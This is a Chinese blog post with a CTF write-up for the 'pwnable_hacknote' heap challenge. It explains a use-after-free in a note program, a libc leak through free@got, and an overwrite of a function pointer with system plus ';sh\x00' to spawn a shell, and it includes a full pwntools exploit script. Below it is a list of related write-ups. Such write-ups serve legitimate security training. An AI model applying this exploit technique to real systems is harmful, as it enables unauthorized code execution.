pwnable_hacknote

最新推荐文章于 2024-01-29 02:22:19 发布
最新推荐文章于 2024-01-29 02:22:19 发布
阅读量421 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn wp python 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/122470644
版权

pwnable_hacknote

使用checksec查看:
在这里插入图片描述

开启了Canary和栈不可执行,没有开启PIE。

先运行一下看看:
在这里插入图片描述

看到菜单,应该是一道堆题了,放进IDA中查看:
在这里插入图片描述

这里我已经将函数重命名了,接下来分步看:

sub_8048956()
在这里插入图片描述

  • 对应menu(),略过

sub_8048646()
在这里插入图片描述

  • ptr[i] = malloc(8u);:程序首先会自动创建一个0x8大小的chunk
  • *(_DWORD *)ptr[i] = puts_0;:puts_0内容是return puts(*(const char **)(a1 + 4));,这个函数作用是puts
  • v0 = ptr[i];:存放puts_0的地址
  • v0[1] = malloc(size);:存放用户创建的chunk的地址
  • 对应add()

sub_80487D4()
在这里插入图片描述

  • free(*((void **)ptr[v1] + 1)); free(ptr[v1]);:先释放用户创建的chunk再释放程序自动创建的chunk,没有清空指针
  • 存在UAF

sub_80488A5()
在这里插入图片描述

  • (*(void (__cdecl **)(void *))ptr[v1])(ptr[v1]);:调用puts_0输出内容

题目思路

  • 存在UFA,利用该漏洞泄露libc
  • puts_0修改为system@got
  • 执行show()就相当于执行system('/bin/sh')

步骤解析

首先创建两个chunk:chunk0、chunk1,大小为0x18,不和程序自动创建的chunk大小相同就行

在这里插入图片描述

接着将两个chunk都free掉,申请0x8大小的一个chunk,这样就能将程序创建的chunk0和chunk1给申请过来,申请时填入的内容会覆盖puts_0和用户创建chunk0的地址

所以这里需要填上puts_0地址,和free@got地址

调用puts_0时就会输出free@got的真实地址

在这里插入图片描述

得到free@got的地址之后就可以计算出system@got的地址。

free掉chunk2在重新申请

同样的申请时填入的内容会覆盖puts_0和用户创建chunk0的地址

此时将puts_0替换为system@got用户创建chunk0的地址替换为;sh\x00即可getshell

在这里插入图片描述

这里使用;sh\x00是因为content的内容是system@got+;sh\x00,首先执行sysstem(system@got)再去执行sysstem(';sh\x00')分号是为了让前面语句结束后执行后面语句

完整exp

from pwn import *

#start 
r = remote("node4.buuoj.cn",25285)
# r = process("../buu/pwnable_hacknote")
elf = ELF("../buu/pwnable_hacknote")
libc = ELF("../buu/ubuntu16(32).so")
context.log_level = 'debug'

def add(size,content):
    r.sendlineafter("choice :",'1')
    r.sendlineafter("size :",str(size))
    r.sendlineafter("Content :",content)

def delete(idx):
    r.sendlineafter("choice :",'2')
    r.sendlineafter("Index :",str(idx))

def show(idx):
    r.sendlineafter("choice :",'3')
    r.sendlineafter("Index :",str(idx))


#params
free_got = elf.got['free']


#attack
add(0x18,'MMMM')
add(0x18,'MMMM')
# gdb.attach(r)
delete(0)
delete(1)

payload = p32(0x804862B) + p32(free_got)
add(0x8,payload)
# gdb.attach(r)

show(0)
free_addr = u32(r.recv(4))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

delete(2)
payload = p32(system_addr) + b';sh\x00'
add(0x8,payload)
# gdb.attach(r)
show(0)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable_hacknote_WP
weixin_56434818的博客
03-01 741
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 395
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
pwnable.tw——hacknote
40KO的博客
02-24 820
很少做pwn,之前也只懂点rop,现在跟着练练pwn的堆利用吧,pwnable.tw上的一题hacknote,比较纯粹的uaf题目,还好不久前看了点glibc内存管理的东西,可以派上用场了。 逆向很轻松,那为什么不直接给源码呢。。。根据add_note函数很容易了解note的结构体特征 unsigned int add_node() { note *v0; // ebx signed...
pwnable_kr:壳牌我们玩游戏吗?
05-14
Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞 转炉 旗帜 密码 随机的 输入 腿 错误 炮击 硬币1 二十一点 乐透 命令1 命令2 af 码图 Memcpy 汇编 取消连结 ...
Pwnable
03-26
Pwnable
pwnable-echo2的附件
11-16
pwnable-echo2的附件
pwnable:项目开发的主要资料库
04-11
可拥有的项目开发的主要资料库尽管在美国劳动力中对熟练IT专业人员的需求稳步增长,但不到一半的美国高中开设了信息技术和计算课程。 供需之间的这种差异可以合理地视为低估了潜在的就业率以及整个IT领域的创新。...
PWM.rar_PWN
09-23
在编程中,"pwn" 通常指的是“Pwnable”类别,这是一个安全领域的术语,指的是利用软件漏洞进行攻击或控制的技巧。在这个上下文中,"pwn" 可能是指编写用于控制硬件(如使用PWM技术)的代码,可能是为了教育、测试或...
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 494
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
pwnable.tw之hacknote
qq_35429581的博客
10-13 2904
uaf漏洞产生的主要原因是释放了一个堆块后,并没有将该指针置为NULL,这样导致该指针处于悬空的状态(有的地方翻译为迷途指针),同样被释放的内存如果被恶意构造数据,就有可能会被利用。 再怎么表述起始还不如真的拿一道题自己调自己看内存看堆状态来的好理解。这也是我觉得ctf-pwn的意义所在,可以把一些漏洞抽象出来以题的形式,作为学习这方面的一个抓手。 此篇尽量做的细致基础,但仍然假设读者已经初步
pwnable.tw hacknote
weixin_30284355的博客
03-22 124
产生漏洞的原因是free后chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] char buf; // [esp+8h] [ebp-10h] unsigned int v3; // [esp+Ch] [ebp-Ch] v3 = __readgsdword(0x14u); ...
PWN刷题】Pwnable-hacknote
QYbudong的博客
05-06 396
回顾经典老题。一、
pwnable_hacknote 5/100
m0_57754423的博客
03-01 168
uaf漏洞利用 sh “;”间隔执行命令 exp: from pwn import * from LibcSearcher import * local_file = './hacknote' # local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' # remote_libc = './libc-2.23.so' select = 1 if select == 0: p = process(local_file) #.
pwnable.tw_hacknote_uaf利用
Jc
07-19 441
一道大家都说入uaf比较好的例题,将自己学习的uaf的历程记录一下,来自某大佬一句励志的话 解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 运行 IDA审计 1.add 2.del 3.print ...
[BUUCTF]-PWN:pwnable_hacknote解析
2301_79326813的博客
01-29 299
先看保护32位,没开pie,got表可修改看ida总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针。
buuoj刷题记录 - pwnable_hacknote
qq_34010404的博客
03-19 271
查看程序保护: 拖进IDA分析一下, Add函数正常,先创建八个字节的内存 struct Node{ { void* func_addr; void* content; } 然后根据输入的size开辟相应大小的内存 问题存在于DelNote函数中,free后没有置0 看一下PrintNote函数: 根据八个字节的前四个字节调用对应的函数,并把这个八个字节的首地址作为参数 若Note被free后,还是可以调用Print函数的,由于不确定func_addr是什么,所以会出现问题. 构造方法: 先Add两
pwn hacknote
最新发布
05-21
HackNote 是一道非常经典的 pwn 题目,其难度较为适中,适合初学者进行练习。其主要思路是通过堆溢出来实现 getshell。具体来说,HackNote 程序是一个笔记本程序,能够添加、查看和删除笔记,其中笔记的信息都是存储在堆上的。而利用堆溢出漏洞,我们可以实现任意地址写,从而获得程序的控制权,最终得到 shell。 如果您想深入了解 pwn 的相关知识,可以参考一些比较经典的 pwn 教程,比如《pwn入门到进阶》、《Pwn入门到实战》等。如果您对 HackNote 题目感兴趣,可以在一些在线平台上进行尝试,比如 Pwnable.kr 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值